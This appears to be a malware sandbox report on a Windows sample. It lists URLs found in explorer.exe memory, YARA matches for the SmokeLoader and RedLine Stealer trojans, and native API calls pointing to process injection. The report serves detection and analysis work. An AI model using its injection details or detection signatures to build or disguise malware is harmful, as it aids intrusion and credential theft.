      Source: explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2722215051.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
      Source: explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
      Source: explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2722215051.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
      Source: explorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000002.00000002.2717195196.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2292315664.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
      Source: explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2722215051.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000004.00000002.1850164583.000000000083D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1583256735.000000000067D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000004.00000002.1849937727.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401529
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00402FFA RtlCreateUserThread,NtTerminateProcess,0_2_00402FFA
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401541
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401545
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401553
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00402379 NtQuerySystemInformation,0_2_00402379
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_0040237B NtQuerySystemInformation,0_2_0040237B
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_0040332A RtlInitUnicodeString,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,0_2_0040332A
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401534
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014DB
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_004020EA NtQuerySystemInformation,0_2_004020EA
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00402387 NtQuerySystemInformation,0_2_00402387
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00402397 NtQuerySystemInformation,0_2_00402397
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_0040239B NtQuerySystemInformation,0_2_0040239B
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_0040239E NtQuerySystemInformation,0_2_0040239E
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401529
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00402FFA RtlCreateUserThread,NtTerminateProcess,4_2_00402FFA
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401541
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401545
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401553
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00402379 NtQuerySystemInformation,4_2_00402379
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_0040237B NtQuerySystemInformation,4_2_0040237B
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_0040332A RtlInitUnicodeString,NtEnumerateKey,4_2_0040332A
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401534
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014DB
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_004020EA NtQuerySystemInformation,4_2_004020EA
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00402387 NtQuerySystemInformation,4_2_00402387
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00402397 NtQuerySystemInformation,4_2_00402397
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_0040239B NtQuerySystemInformation,4_2_0040239B
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_0040239E NtQuerySystemInformation,4_2_0040239E
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_0040332A0_2_0040332A
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00418A700_2_00418A70
      Source: C:\Windows\explorer.exeCode function: 2_2_029928D02_2_029928D0
      Source: C:\Windows\explorer.exeCode function: 2_2_085828D02_2_085828D0
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00418A704_2_00418A70
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\jtruajj F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
      Source: RmbF3635xY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000004.00000002.1850164583.000000000083D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1583256735.000000000067D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
